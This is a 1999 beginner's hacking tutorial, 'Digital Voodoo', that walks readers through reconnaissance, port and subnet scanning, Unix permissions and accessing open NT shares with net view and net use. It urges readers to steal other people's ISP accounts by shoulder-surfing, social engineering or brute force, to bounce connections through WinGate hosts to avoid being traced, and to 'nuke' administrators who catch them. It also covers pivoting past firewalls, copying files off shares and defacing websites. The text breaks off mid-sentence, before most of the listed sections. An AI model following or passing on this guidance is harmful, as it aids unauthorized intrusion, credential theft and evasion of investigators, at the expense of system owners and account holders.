Digital Voodoo
-= The craft of Hacking on the Internet =-
- Release 2.2 -
Kurruppt2k, 1999
kurruppt2k@mailcity.com
Related material and necessary programs available at The CyberUnderground
http://www.users.uswest.net/~kurruppt2k
Information Insemination
__________________________________________________
New in Release 2
Intro
Prerequisites
A little Hacker lingo
What you need - a Hacker's equipment
Keeping from getting caught
TCP/IP and the Clent/Server model
Getting Started
I dub thee... "Hacker"
Unix
NT
Netware
"Unbeleivable... a Hacker!"
Eleet Hacker Tactics
Firewall Penatration
In Summary
Appendix A - commonly used passwords / usernames
Appendix B - basic Unix commands
Appendix C - further reading
Appendix D - well known UDP and TCP ports
__________________________________________________
New in Release 2
Why a second release so soon? Well, the first release was written in very little time. I put Digital Voodoo out on TCU (The
CyberUnderground) immediately after it was finished. Soon later, after reading over it a few times, I decided that, though informative and
braud, the text was still missing a little. For the most part, I left what I had alone, but I did add a few sections. Rather than just updating it
and reposting it on my site, so many copies had already circulated in such a short amount of time, I decided to just call it a second
realease. Penetrating Firewalls is a brand new section, and offers valuable info to those who aren't complete newbies. Also, I added a lot
of usefull NT breakin tactics to the NT section. More usefull info was also included in the Unix section as well. A few more appendicies
were added too - all in all, release 2 (now 2.2!) is quite a bit more full of content than its predecessors. By the way: I wrote this with
Windows WordPad which you all know doesn't have a spell checker. Deal with it. So sit back, crack open a can of Jolt Cola, and dig in.
About the Author
My name is Kurruppt2k. Occasionally, I've gone by the handles (\/)3n4c3 (\/)n3m0n|c and | )igi741 Vood00 (hence the title of this text).
As of the writing of this second addition, I'm 19 years old, and in college for a degree in Network Support. I absolutely love computers,
networks, TCP/IP and internetworks, and therefore the Internet (not the WWW). Though a bit immature and overquoted, I beleive in
most of the Hacker Manifesto (if you've never read it, now would be a good time to do so). Information, in my humble opinion, is
hoarded and safegaurded. The biggest advances the technological world has made were due to people willing to share thier ideas and
informational resources with others. Take Linux and GNU, for example (if you are unfarmilliar with GNU... you aught not be). I, as a
hacker, don't wish to wreak havoc, crash systems, deface websites, prove my 'leetness' to my friends by breaking into systems. I like to be
pitted in a match of wits, to use my head and knowlege of computers and networks to circumvent traditionally unpenatrable systems. I
want to know what's out there, and why its so secretive. I want that euphoric feeling of understanding exacly how a certain system works.
Lots of people become hackers (or attempt to become) for all the wrong reasons. The desire to deface someone's website will not usually
be motivation enough to accomplish the task. Only an unsatiable curiosity will drive you to obtain whatever goal you set for yourself.
Cliche, but true.
Intro
The reason I wrote this is because there are a vast amount of "hacking for newbies" texts available on the Internet, most by very
knowlegable individuals. However, they all (to the best of my knowlege) cover dialup hacking only. To explain what I mean by that, let
me catogorize the various means in which a hacker gains access to a computer, supermini, mainframe, etc - into three distict genres.
There's the obvious on-site access, which is as simple as being in the premesis of the system in question. Threre's dial-up access, which is
simply using a modem to to dial into another modem, and going from there. And finally, there's what I will hereafter refer to as IP access.
In short, this means accessing a system via the Internet. On-site (relatively unfeezable in most cases) hacking is usually covered breifly in
most of the readily available texts out there, though they mostly focus on dial-up hacking. The idea of connecting to a computer
elsewhere with a modem has been around a long time, so therefore has the dial-up access method of hacking. But the Internet, having
only been around for about 30 years, has not been a widely used method of access. Until recently. Actually, it hasn't been that recent, so
why a guide to hacking on the internet hasn't already been written is beyond me. That is the primary focus of this text. Take any
computer or network of any potential target of yours, and most likely they are connected to the Internet. Which means you, as a Internet-
hacker-to-be can break into it. This is very good for people like us, because finding a computer or network on the Internet is much easier
than finding a modem number (I'll explain how later). One last thing before we get into the actual hacking stuff: this text will not teach
you to be a hacker, nor will any text out there or any collection of texts. Hacking is a self-tought craft, meaning you will need the
dedication to go out and find materials on your own. If you have a specific question, go ahead and ask someone on a hacker IRC channel
of whatever, but if your question is too broad ('how do I hack into a Netware box?') you will be ridiculed and labeled a lamer. Keep your
questuins technical in nature ('what's the SMTP command to set the recipient'), and most will be happy to share thier knowlege with you.
Once you've comleted this text, I suggest you play around with what you've learned (as 80% or so of what you learn will come from
hands-on experience). Next you will need some material on topics just glazed over in this text. Get yourself a UNIX book (UNIX for
dummies, Teach yourself UNIX in 24 hours, whatever). Then get yourself a book on Windows Networking. These are also readily
available. Other books you should have in your collection are general hacking books. The book Maximum Security is very informative,
as is Secrets The Happy Hacker. Secrets of a Super Hacker, Steal This Computer Book, and the New Hacker's Dictionary are at least
worth checking out at your library. If all this seems like too much work, well then you probably lack the dedication to become a hacker.
If you're still eager to learn - great! This text will point you in the right direction. So, without further adoo (adu?) - on with the hacking!
Prerequisites
First of all, let me say that it is assumed that the reader of this text already has a basic working knowlege of computers and the Internet.
Not exstensive, by any means. This text is targeted to people who probably have thier own computer (or ready access to one), surf the
web, and have always wanted to know what exactly hacking was all about. If you start reading and find yourself lost, put this down and
go get yourself a basic book on computers and the Internet before you delve into this. For example, its assumed that you already know
what a URL is (eg: http://www.hackers.com/archives). This realy goes without saying, but I as the writer of this text, take no
responsibility in the actons of those who act based upon principals learned by reading this material. Really, this is intended to inform
anyone who's always wondered how exactly these "hackers" they hear so much about do what they do, and for concerned sytem
administrators who want to know how hackers can infiltrate thier network. Okay, anyways, onto the good stuff.
A little Hacker lingo
I'll get the jargon out of the way now, in case I refer to one of these terms later.
Hacker - one who infiltrates and explores various computer sytems for the sole purpose of expanding their knowlege and satisfying ther
insatiable thirst for information.
Cracker - a hacker who acts maliciously. Deletes, crashes, implements viruses, etc.
Warez d00d - a lowlife techno weenie who sells pirated software (basically people who couldn't quite make it as a hacker).
Eleet, leet, el33t, 31337, etc - a hacker who's learned just about everything there is to know regaurding computers, networks, and security
(not really possible). Many claim to be leet, very few are.
Newbie - an amatuer hacker (different from a lamer).
Lamer - a complete hacker wannabe. The difference between a newbie and a lamer is this: a lamer knows a little bit, decides that's
enough, and calls himself a hacker. A newbie also knows a little bit, but is humble enough to know that there is a lot more to be learned.
Root - status on any sytem that gives the hacker total control of it. Usually, root is the desired end result of any hack.
Rootshell - a shell is an interface between you as a user and a particular computer. Windows Explorer is a shell, DOS prompts are a shell.
If you log into a UNIX machine, you are using a shell. So a rootshell is a shell with root (superuser) privelages to resources on that
machine. You can obtain a rootshell by either logging into the box as root (assuming you have the password) or by using an exploit
program to create a rootshell for you (more on this later).
Packet - when data is sent over a network, it is broken down into managable chuks called packets. This isn't always the case, but in
TCP/IP (the protocol used on the Internet), this is always true.
Protocol - a set of rules and guidlines that computers on a network must follow in order for communicatios to be coordinated, and therefor
successful. A protocol defines specifically how data is broken into packets, sent over a wire, and reassembled at the other computer (and
how sessions are set up over a network).
Client - Usually refers to either A: a computer on a network that requests resources from a server, or a computer that is not a server; or B:
a program that makes request of a server or service. Netscape Navigator and Internet Explorer are client software programs in that they
request web pages from servers.
Server - Either A: a computer set up to share resources such as printers, files, or serve web sites, or B: a program used to fofull requests,
such as IIS (Microsoft's Internet Information Server). More on clients and servers later.
Proxy Server - Okay, if a company has its own network and its own sebsite, there will be a portion of the network accessable (with a
username and password, of course) by anyone with Internet access. All the HTML files for the company's website will be somewhere on
this segment of the network. Then, there will be the portion of the network stricly for business purposes, hidden from the rest of the
world. A proxy server (along with sometimes a firewall) seperates these two segments. So if you want to access the restricted part of any
network, you will need to do it via the proxy server. Also, if all the workstations in an office have Internet access, they most likely do
through the proxy server.
Firewall - Sort of like a proxy server, but has no other purpose but to keep unautorized user out. Even if you have a valid username and
password for a system - if a firewall is in your way, you're pretty much out of luck. Hacking through one is next to impossible. Hacking
around one is slightly easier (more on this later).
What you need - a Hacker's equipment
Here is a basic list of the hardware, software, and other miscellaneous things you will need to begin your days in the world of digital
espionage.
· A computer (duh) with some kind of Internet access, beit PPP, a T1, or whatever (more on this later).
· One, prefferably two accounts with an ISP, your phone company, or whatever. One should be in no way shape of form attatched to you (ie:
someone elses account!) More on this later.
· The following software:
An Internet browser (Netscape Communicator, Microsoft Internet Explorer, whatever).
A telnet client (comes with most UNIX sytems, Windows 95/98/NT/2000).
An FTP client (comes with most UNIX systems,Windows 95/98/NT/2000).
A ping utility (comes with most UNIX and Windows products, I beleive).
An IP scanner.
A port scanner.
A sharescanner.
A finger client.
A whois and lookup utility (though this can be done on the Web)
A traceroute utility (comes with most Windows products, I beleive).
A password cracker .
A brute force engine of some sort (this you can make yourself).
Sound complicated already? Its really not - I'll explain the function of each shortly. First, I'll list some effective programs for each.
Browsers (actually, not that important to a hacker) are pretty commonplace. As far as a telnet client, if you have any UNIX system (BSD,
System V, Linux, or whatever) or Windows 95 or above, you most likely have one. Do a search for 'telnet.' Otherwise, grab a copy of it
from a friend - its pretty common. Most computers come with some sort of FTP client as well - in either UNIX or at a DOS prompt type
'ftp' and it should come up. Otherwise, get it from a friend (most have it, even though they might not even have heard of it). Ping utilities
are as common as telnet and FTP. Type 'ping' at a UNIX or DOS prompt. The later versions of Netscape and MIE have an FTP client
built in, but are pretty limited. Now the various types of scanners are a little harder to find, as they aren't used for much besides hacking
(or attempting to hack). HakTek is an oldie but goodie - it has an IP scanner, a port scanner, a ping utility, and a finger client (and even an
email bomb utility, if you're into that sort of thing). WS Ping ProPack (a legitimate program beleive it or not) is a great piece of software.
It has an IP scanner, a port scanner, a ping utility, a finger client, whois and lookup utilities, traceroute, and a variety of other possibly
useful utilities. I seriously suggest that you download the evaluation version at http://www.ipswitch.com. Tracerout is also integrated into
(I beleive) Windows 95 and above. Type 'tracert' at a DOS prompt. Legion is a pretty good sharescanner, and I'm told Winhack Gold is
decent (for UNIX). Now as far as password crackers go, there are a lot. What you need all depends on what platform (operating system)
you have, and the platform of the computer that the password file belongs to. If you have any flavor of UNIX and are cracking a UNIX
password file, get Cracker Jack. If you have a Windows product and are cracking a UNIX password, get John the Ripper. If you have a
Windows product and are hacking an NT Server (or any other Windows machine) get Lopht Crack. Finally, the brute force engine.
Simply a program designed to spit out words from a dictionary file (or a range of numbers) into a login/password prompt, used by hackers
in hopes to find a valid username/password combo. The problem with pre-made BF engines is that there are almost unlimited
combinations of login screens (as far as in what order, 'group,' or related login prompts, number of attempts before disconnection, etc), so
you are usually better of writing your own. If you have absolutely no programming experience, well, now's the time to learn a little. This
isn't nearly as tough as it may seem, as I'll discuss later. One more program you might want to look into is a nuking program of some kind
(WinNuke, Bitch Slap, anything). These come in handy in basically two instances (unless you just like to cause trouble - in which case
you are considered a 'cracker,' not a hacker). You may, in your explorations, run into a not-so-friendly hacker, who feels threatened by
your attempting to move in his territory (Acid Burn in Hackers). Nuking programs allow you to 'nuke' an IP address, and you can usually
find out the IP address of anyone logged on to a certain system. So if you are being threatened by a cracker somewhere - nuke em! The
other instance where this utility comes in handy is if you get caught red-handed hacking by the system's administrator or operator, and he
becomes hell-bent on finding your actual location. Nuke the computer you were on or the network's proxy server, to slow him down, and
disconnect as soon as possible. Please, though, don't go around nuking everything because you are getting frusterated. This is very lamer-
like, and will get you busted much quicker than breaking into the system. Now to turn your UNIX or Windows machinge (or even Mac, I
suppose) into a mean h4x0r b0x, you should go about the Internet and download at least one of each of these. Make one of the first
options on your start menu something like 'hacker utilities', and have a shortcut to each program on that menu, for quick access.
Keeping from getting caught
Hacking is a grey area, as far as what exactly is legal, and what exactly isn't. Even if you follow the hacker code of ethics (never harm),
you are still quite possibly braking one or more laws. Let me just say that if you are already on a system, with someone else's login name
and password, you are blatently breaking a few laws. Nuking is also illegal. IP and port scanning are not illegal, though they definately
cause suspiscion. In the past, measures to keep oneself safe included hacking from payphones, splicing your neghbor's line, 'bouncing'
your call (explained later), and even using programs such as Modem Jammer. Now, you should use one or more of these methods to keep
from being physically traced, and another to keep from being traced over the Internet (to your ISP). The best and probably easiest way to
do this is use someone else's account, prefferably on a different ISP. This is much easier to do that one might expect. Shouldersurf
someone typing in thier login/password, do a little social engineering (explained later), or even brute forcing to get a valid account. There
are even programs out there that if run on a machine used to access the Internet via a dial-up (with an ISP) it will give you the password.
One such example is Dripper (avalable at The CyberUnderground). As far as physically tracing you goes, if you are using someone else's
account you are sort of safe. If you have hacked into a system with a low-level account (a 'guest' account, for example) and just got
yourself root (see definition above), you should seriously consider adding a few methods of security before reconnecting. To hack from a
payphone, get an acuistic coupler for your modem, set the receiver on it, and just dial out. Bouncing your call means basically calling a
modem somewhere that is designated as an 'outdial', meaning once connected, any modem commands you issue will go to it, so you can
dial from it somewhere else. If you are traced - it will be to that modem. This can be defeated though, so its a good idea to bounce calls
off a few outdials. Outdials are pretty hard to find, but are most common on X.25's and other PSN's (for more info on outdials, read any
other hacking text, like "The Neophite's Guide to Hacking," or "The Newbie's Handbook."
Anther secutiy method (similar to bouncing your call) is bouncing your IP attack. Meaning - telnet to system that supports telnet itself –
then telnet to your target. Finding and obtaining access to one of these is difficult for a new hacker, so I'll go into greater detail on this
later. Another effective meathod to having your IP addresse logged into the system you're connected to (and thereby "busted,") is
bouncing your packets off a WinGate host. WinGate is a server software program that acts kind of like a proxy server and firewall all in
one (see above for definitions). As with a generic proxy server, all computers in the office that the WinGate computer is in connect to it to
get to the Internet - and you can do the same. All you need is the IP address or domain name of a WinGate host. Telnet to it, and type the
IP address you want to get to at the prompt you get. The IP address of the WinGate box will be logged as you connect - not your own.
Finding WinGates is very easy - just go to any hacker website (www.cyberarmy.com is a good one) and look at their database of
WinGate's. You'll have to weed through lists of bad WinGate's though, so you may be better off getting a WinGate scanner and doing it
yourself. If you're realy smart, you'll bounce your packets off a few WinGate's before getting to your target.
As a rule of thumb, the amount of security you should be using is directly related to the seriousness of your hack. Though, you could be
breaking many federal and state laws without even being close to having root access, and not even quite sure what you are doing. It
cannot be stressed enough: be as safe as possible.
TCP/IP and the Clinet/Server model
Transfer Control Protocol/Internetwork Protocol. The 'language,' or means for which packets are exchanged over the Internet, or any
intranet. TCP/IP is nothing more than a set of rules and regulations that specifically define exacly how data is transferred between
computers on a network. This protocol has several sub-protocols, known as the TCP/IP protocol suite. To utilize any of these
subprotocols, you just need a client of that. For example, Windows 95 and above has a built-in FTP and Telnet client (a client, when
referring to a protocol, is a program that lets a user utilize that protocol). In this section I will explain each of these subprotocols, and
other protocols used over the internet.
One concept that it is imperitive you understand is the Client/Server model. Every protocol is utilized with software. For example: HTTP
(Hyper Text Tranfer Protocol, the protocol used to transfer HTML web pages to and from your computer [this is why it is at the beginning
of URL's you visit] ). This protocul is put to use by software. This software has two pieces, a client side and a server side. When you
type in a URL or click on a link, you are using a HTTP client software program (a browser) to request a copy of a particular web page.
Then, the server of the URL you requested has HTTP server software, that recieves the request (in the form of packets), and provides you
with a copy of it, by sending it back to your computer. A server side software package is also called a service, and is accessed via ports.
A port is a "virtaul channel" used to transfer packets of a specific protocol between a client and a server. When you hear the term
'portscanning,' what is being referred to is the scanning for protocol, or services. Also, each port (service installed on the server in
question) has a number assigned to it (eg: telnet is generally number 23). At any rate, think of client side software as the requestor, and
the server side software as the provider.
PPP. There are many protocols, most of which discussed here are used over the Internet's high-speed digital lines. However, there are
lots of protocols used over regular analog phonelines, used before the Internet was a major computing tool. These include Kermit,
Xmodem, Ymodem, etc, and all have parralles in the TCP/IP protocol suite. However, the only "analog phoneline" one I'll cover is PPP.
PPP (Point to Point Protocol) is the protocol used to connect to your ISP's server, who intern sends and recieves TCP/IP packets over the
internet for you. SLIP is similar, but not as effective and as widely used. Basically, the way you are able to communicate with the digital
network of the Internet is that your ISP translates TCP/IP packets to PPP so they can travel over phone lines, and vice versa.
Telnet. Let's start at the basics - on, say, a UNIX platform, there is one or more UNIX boxes - the computer that does the processing and
holds all the data (files, applications, the OS, etc) which is the computer on the network that you are most likely trying to hack into. Then
there are a slew of dumb terminals directly connected to it. A dumb termianl consists of nothing more than a monitor and a keyboard –
everything a user types/does on a dumb terminal is handled by the UNIX box. Now, telnet is a protocol/application that allows people to
connect to a computer remotely (over a phone line or the Interent) and proccess data localy - meaning when you connect to a UNIX box
via telnet, it just as if you were at a dumb terminal directly connected to the UNIX box. Telnet is the protocol you will be using to access
the computer you are hacking into.
FTP. File Transfer Protocol. This is the protocol used to transfer files between computers over the Internet. Whether you are
downloading password files or uploading changes to their HTML files, you will do it through FTP. To start an FTP session, you need to
log in to the service with an FTP client, just as you would with Telnet. More on this later. Incidentally, the later browsers from Netcape
and Microsoft have an FTP client built in. To use it, type 'ftp' instead of 'http' in your browser.
SMTP. Simple Mail Transfer Protocol. This is the protocol used to send and receive email. If you connect to a SMTP port (by telnetting
into it) you can issue SMTP commands. When you send an email, along with the actual letter go along its protocol. This means that the
SMTP packets (made up of your letter and other protocol-specific data) connects to port 25, and issues the appropriate commands to the
SMTP service in order for the letter to reach its recipient. You can also connect to this port and issue these commands manually. The use
of this could be sending email and changing the sender address to someone else (possibly the recipients employer). Also, with the VRFY
command, you can find out whether or not a particular account (login name) exists on the network in question. Use the HELP command
to fermiliarize yourself with the various SMTP commands.
HTTP. Hyper Text Transfer Protocol. This, again, is the protocol used to transfer HTML pages back and forth between two computers.
Finger. This protocol (also a UNIX utility) is used to obtain informatin about users on a remote machine. With a finger client, you can
see who's logged on currently, and can find specific information about a specific user.
DNS. Domain Name Service. If a computer has this port open, it generally means that this particular computer is a domain server of that
network (the spokesperson, if you will). If you were to telnet to a network/domain, and didn't specify a computer (eg: hackers.com,
instead of comp3.hackers.com) you would by default be connected to one of the name servers of that network.
NBT. This stands for NetBIOS over TCP/IP, and is what Windows networks use. Another name for this is 'nbsession,' which generally
indicates NetBIOS used over a Wide Area Network (such as the Internet), being that NetBIOS by itself (without TCP/IP) cannot be used
over a WAN.
SNMP, UDP, ICMP, SMB, NetBEUI, POP. These, along with many other protocols are used regularly over the internet as well. It is not
in the scope of this text to explain them all, so I encourage you to research them and the others I've covered in more detail.
Getting Started
Okay - you've found the network/system that you want to hack. What's first? Find out which of these protocols the target supports. Can
you telnet to this computer? Can you FTP to it and copy files from it? To find out, you will need to run a portscan on it, with you
portscanning utility. Just type in the URL or IP address of the machine in question, and start scanning. You will be shown what protocols
(TCP/IP subprotocols and others) the target has. It will not, however, tell you that it supports TCP/IP, because, to put it simply, it has to
have TCP/IP to be on the Internet. What you are looking for here is services - these TCP/IP subprotocols and other services/ports. Do not
let the term port mislead you - we're not talking about physical ports.
Now, if the portscan indicated that the target maching supportds telnet (port 23), you can telnet to it, and attempt to log in. Go ahead - try
it. You'll need a valid username/password combo to get it, which we'll get to later.
If port 21 is open, that means that the maching supports FTP, and files can be transfered back and forth from it. But, like access via telnet,
you'll need a login name and password. A default "anonymous" account is ftp/ftp for a username/password, so go ahead and try that. If
this works (and don't be surprised if it doesn't), you won't have much in the way of access privelages (meaning you'll be able to look at
files, but usually not copy files to your computer, and most likely not copy files to it). If you can anonymously log on, you at least have
your foot in the door, and can possibly use this as a stair stepping to get further into the system. More on this later. Once logged on via an
FTP port, commands to jump around from directory to directory and copy files is very DOS-like (actially more UNIX-like than DOS, but
if you know a little DOS, you should feel comforable navigating the system). Type 'help' or '?' for a list of commands. When you do this,
you are accessing a help file on your computer. To access the help file on the computer your on (which is usually more extensive and has
commands specific to the computer your logged on to) type 'rhelp' or 'remotehelp,' or something similar. Or you could telnet to the FTP
port and type 'help.' FTP is the only way to transfer files between the target computer and yours - which you will need to do to get
password files, change thier website ('this site has been hacked by Kurruppt2k'), or whatever. More on this later. One last note on FTP –
you can telnet to an FTP port, and log in. However, since you are not using an FTP client, you will not be able to do much once inside
(like get directory listings or download files) because your telnet program does not follow the rules and guidelines (protocol) specified in
FTP. In fact, you can telnet to any port, but if the right commands are not issued (usually done by your client program), you may not get
anywhere, and may even be disconnected. Telnetting to ports that you aren't sure what are, though, is a very good way to learn about the
computer you are targeting, and is usually necessary to break in.
Now, if your portscan turned up either 'www' or 'http,' that means that you've found the computer that has all the HTML files (website
files) that contain this organizations website. This realy is only relevant if you are attempting to break into the target's website. To do so,
you'll need access to the index.html file (usually only accessable to superusers, or root accounts), and will have to FTP the page you will
replace thiers with, and replace index.html with your own. Doing this, though, could be considered cracker-like, and slightly malicious.
This also tends to piss sysadmins off, and may drive them to attempting to find you - so be careful!
A last few notes on TCP/IP. You need to understand the structure of a URL, and of an IP address. Every computer on the Internet is
designated by an address. The addressing scheme (IPv4) looks something like this: 38.233.203.2. Generally, the very last number is the
node address, or the computer's address. The second to last is the subnet address. Each number between the decimals (called an octet)
can be from 0 to 254. So the IP address is in the 38.233.203 subnet. The last number, again, specifies the computer in that subnet. So if
you wanted to see what other machines were on that subnet, you would scan from 38.233.203.0 to 38.233.203.254. Now, each IP address
can also have a name. If 38.233.203.2 belongs to the netscape.com domain, it might be www.netscape.com, or mail.netscape.com, or
something similar. So when you type www.netscape.com to visit its website, you could also type http://38.233.203.2 (assuming that was
its IP address). Which brings ut to URL. Here is a typeical "web address": http://www.microsoft.com/servives/windowsNT.
The http:// specifies the protocol used. You could also replace it with ftp:// or even telnet://. (Note: to log in via ftp with your browser,
use ftp://username:password@www.yourtarget.com.) The www.microsoft.com is just the computer name. The DNS protocol handles
resolving the name into an IP address. The /services/windowsNT is the path to the file you are requesting (index.html, if none other is
specified), just like a path on your computer (with foreward slashed instead of backslashes).
I dub thee... "Hacker"
Okay, you now should have enough preliminary knowlege to start your very first hack. Pick a target. Universities usually have somewhat
lax security. Pick something relatively easy for your first time. Stay away from government networks and those belonging to large
businesses and corporations. The very first step is finding the domain name of your target. If your target is www.spicegirls.com, the
domain name is simply spicegirls.com.
Step one. Every successful hack starts with a little preliminary investiagation. The more information you have about a specific domain,
the better armed you are. Open a notebook and start an "info collection" of your target. First, visit thier website. Try to view every page,
and write down anything of importance. Copy down all email addresses - as these are also usually valid login names. Write down
anything else of relevence. Next run a whois or NSlookup on the domain, with your appropriate utility (available at The
CyberUnderground). This will give you very usefull information. You'll get the doman's nameservers, the administrator, and a few more
email addresses, other computers on the network, and other usefull stuff. Copy everything down. Another trick is sending an email to the
domain with a username that you know doesn't exist (eg: blablabla@yourtarget.com). The SMTP service of whatever server is designated
as the primary mail server of that network will return a letter to you saying that there is no such user. In the header of this email will also
be some usefull information - copy it all down.
Step two. Next you should try to get a scope of what kinds of computers are on the outside of this network (by outside, I mean what
machines are "on the Internet," and not behind a firewall or proxy server). To do so, you will scan the subnet with your trusty IP scanner.
Again, a subnet is every computer (nubmers 1 through 254) on a particular range of IP addresses. For example, 253.87.8.3 and
253.87.8.45 would be on the same subnet, whereas 253.87.8.45 and 253.87.11.12 are not. (Actually, class C subnets are often-times
broken up even further - read an RFC on IP to learn all about IP addressing, packet structure, etc.) To scan the subnet of your target, do as
follows. Ping the hostname (your computer should have a ping utility, as do most of the hacker programs you should already have). This
will give you the IP address of the domain's primary name server (as would a lookup or whois). If the IP address is 253.87.8.45, scan the
entire subnet, which would be 253.87.8.1 through 253.87.8.254. This will tell you every computer on that subnet - thier IP address'es and
hostnames if applicable. If you already know of two computers on different subnets, scan both. Now, write down each computer you
found and thier IP addresses, along with any relevent notes. When you're done, you should have a list of each (or most) of the servers on
your target's network, not behind a firewall/proxy server.
Step three. Now that you know what servers are on this network, you need to find out what services are running on each one. So what do
you do next? You guessed it - you'll scan for services, or ports, on each computer you found. Use your portscanner and scan each
computer you wrote down. Think of each service running on a machine is like a door that you might be able to break in through. Below
I'll explain methods to use to possibly "break and enter" through each "door." Now, to get in, and have the power to acutally do things
and explore the network, you'll need to telnet into one of the machines. This is usually the last step of hacking your way in, and you'll
need a username and password to do so (or an exploit, which will be explained shortly). You'll hack into other ports in order to get these
usernames and passwords. Now, a username and password that works one one machine of the network will usually work on all on that
same network, so if you get passwords from one computer, you can use them on a different one to get in. Also, if there are no telnet ports,
you can still (sometimes) log in via FTP. You won't be able to do much (like run any programs on the computer), but you will be able to
look around and upload or download files from the computer. This all, of course, is assuming the computer is a Unix machine, which
most computers on the Internet are. You may come across a Windows NT machine, which are entirely different. This means to become
elite, you'll have to learn both operating systems.
Unix
The vast majority of the computers you'll come across on the Internet will be some flavor of Unix, beit BSD, Solaris, AIX, Linux, or
whatever. Unix systems are set up to be multiuser. There will be a Unix box with lots of dumb terminals (monitors and keyboards with
no boxes of thier own) directly hardwired into it. Each person who is authorized to be on a dumb terminal (or access the box via telnet)
has an account on that system, and probably on each machine on that subnet. Thier account has thier own directory (folder), which is the
same as thier username. As soon as they log in, they will be placed in that directory, or thier home directory. Every file and directory in a
user's home directory belongs to that user, beit a text file, program, or whatever. Also, every user belongs to a group. This is important,
because it is a fundamental of how permissions work. Not every user is allowed to read every file on the computer, change every file, and
run every program. To list the files in your pwd (present working directory, the "folder" your currently in) type 'ls' (without the
quotations). This is equivalent to the 'dir' command in DOS. To see the permissions of the files in your pwd, type 'ls -l'. This will tell you
the permissions of that file, including who owns it, and what group that user belongs to. Permission categories are set for read
permissions (the ability to read the file), write (the ability to make changes to the file), and execute (the ability to run the program). Each
cagegory is set for the owner of that file (user), everyone in that user's group (group), and then for everyone else on the system (other).
When you issue an ls -l for each file will be listed a ten character string. The first chacter will be a dash (-) if its a regular file, a 'd' if its a
directory, or an 'l' if its a symbolic link (kinda like a windows shortcut). Other less common letters may appear, which I won't cover. The
next nine characters are broken up to three sets of three. The first three apply to 'user,' or the owner of that file. Each of the three
characters represent either an r for read, a w for write, or an x for execute. If they have permissions to read, write, or execute that file, the
corresponding letter will appear, if not, a dash will. The next set of three characters apply to the file owner's group, with r, w, and x in the
same manner. And the last set of three are for 'other,' meaning the permissions (r, w, and x) for everyone else on that system. So a
permissions string of -rwxr--r-- means that its a regular file (not a directory or link), that the owner of that file can read it, make changes to
it, and execute it. Also, we see that the group that the user belongs to can also read the file (but not change or execute it), and that
everyone else can read it but nothing else.
Unix is set up much like DOS, in that there are directories with subdirectories, and a root directory. Intead of C:\tools\ftp you would see
/tools/ftp. The slashes are foreward instead of back, and there is no drive letter - root is simply /.
Oftentimes, if you find a Unix machine on the Internet, it is connected to a variety of other computers. What's more exiciting is that the
Unix machine you just broke into may be directly connected to another, mor secret Unix computer that was behind a firewall (meaning
that you normally wouldn't be able to just telnet to it from your home computer, and it probably didn't show up on a subnet scan). If you
telnet from your hacked Unix account, to another unix machine, your source IP address becomes that of the unix machine you are on (this
is often done to deter authorities from tracing a hack). So lets pretend you run a subnet scan on your target network, looking for a
computer called secret.network.com. Among others, you find comp1.network.com, comp2.network.com, and comp3.network.com. But
no computer named secret. And if you try to telnet to secret.network.com, you're connection lasts only a split second. Firewall.After a
few hours of plugging away gets you a rootshell on comp2. You then telnet from comp2 to secret, and are presented with a logon prompt.
Why can you now connect to secret? Because your IP address is now comp2's, meaning secret is set up to allow connections from
computers only on its network - and it thinks you are comp2. For a list of connected Unix machines, look at /etc/hosts.
When you first log into a machine with a username and password you 'hacked,' find out what group that accont belongs to, and get a feel
for what kinds of stuff you have access to, and what you don't. If you find yourself with just about zero access to anything fun, you'll have
to use the account you have to obtain one with more privelages. For more info on Unix, get a Unix book, or read the Unix Bible text file
(available at The CyberUnderground). This is one operating system that you will need to know, and well, if you plan on becoming eleet.
For some basic Unix commands, look at Appendix B at the end of this text.
NT
Until recently, UNIX machines make up the vast majority of machines on the Internet. Windows NT has eaten up some of that percintile.
Now, somewhere between 10% and 15% of machines you'll find on the Net are NT boxes. NT machines ship and are compatable with
almost as many services as UNIX, with a few differences. Generally, you won't find as many open ports on a Windows box because they
don't use raw sockets like the various flavors of Unix (a socket is a two-way connection between two computers, using any protocol). NT
Server ships with and FTP server (IIS). Finger servers can also be purchased for NT machines. SMTP and POP (Post Office Protocol)
servers come with Microsoft Exchange, which is pretty commonplace. One port that will give your target away as a Windows box is an
open port 139. This is the port for NBT, or 'nbsession' according to some portscanners. Unix machines use strictly TCP/P for
communications (making them ideal machines for the Internet), whereas NT uses NetBIOS (NetBIOS does not work over the Internet, so
NT Servers must utilize NetBIOS over TCP/IP in oder to do so), or what they call NetBEUI (NetBIOS Extended User Interface). To
connect to an NT machine, you must use Microsoft Client. Using MS Client to connec to a NetBIOS port on a Windows machine is
similar in nature to telnetting to port 23 on a UNIX machine. If you have Windows 95 / 98 / NT, you have Microsoft Client. It might not
have it installed though. To check, go to Control Panel, then Network. You should then see a list of protocols you have installed on your
machine. In order to use MS Client, you need NetBEUI, Client for Microsoft Networks, and (of course) TCP/IP. If you are missing any
of these, click on 'Add' and add the appropriate client or protocol (you'll probably need Windows disks). To use MS Client, open a DOS
box. The command you will be using is 'net.'
Type 'net' to see a list of Net commands. Some of these cannot be issued from a DOS windows. The two you as a hacker should be
concened with are 'net view' and 'net use'. If ever you come across a machine with an open port 139, there is a chance that the machine
has open shares on it. A Windows share is a directory somewhere on the server (beit Windows 95, 98, or NT) that is set up to be accessed
by others in the network. Sometimes they are password protected, sometimes not. Once connected to a share, you can use regular DOS
commands (cd, mkdir, edit, etc.) to move about and manipulate files within it. To look for shares on an NT box with NetBIOS, at a DOS
prompt type:
net view \\[ip address]
Again, this will only work if you have NetBEUI, TCP/IP, and Client for Microsoft Networks installed on your computer. If there are any
open shares, they will be listed by name after you issue this command. So lets say you net view some.server.net, and are told that there is
a share called 'users'. To connect to it, type:
net use [d]: \\[ip address]\[sharename]
or in this case...
net use w: \\some.server.net\users
where w: is the drive letter you are mapping a share to. If you get a 'the command was completed succesfully' then you are connected to
the share. Change drives to w: (or whatever drive letter you picked) and hit 'dir.' Now, lets say that the share 'users' was
'C:\network\users' on the NT box. Your drive w: is now C:\network\users, though you can't go any higher up the filesystem than where
you start. Unlike UNIX, you won't be alble to issue a command to see what permissoins you have - so you'll just have to try it out. Create
and erase a file. Make and delete a directory. You could have only read permissions, or you may have read and write (read files and
modify them). If you see a file you want a copy of, do someting like this:
type fileIwant.txt > C:\mybox\fileIwant.txt
And it will copy over to your machine. If ever you come across a passworded share, you have a few options on how to get past the
protection. You could get the password hashes and crack them with L0phtCrack (explained later). Or, you could write a batch file that
connects to the share, then spits passwords from a wordlist (available all over). If you aren't skilled at writing batch files, get yourself a
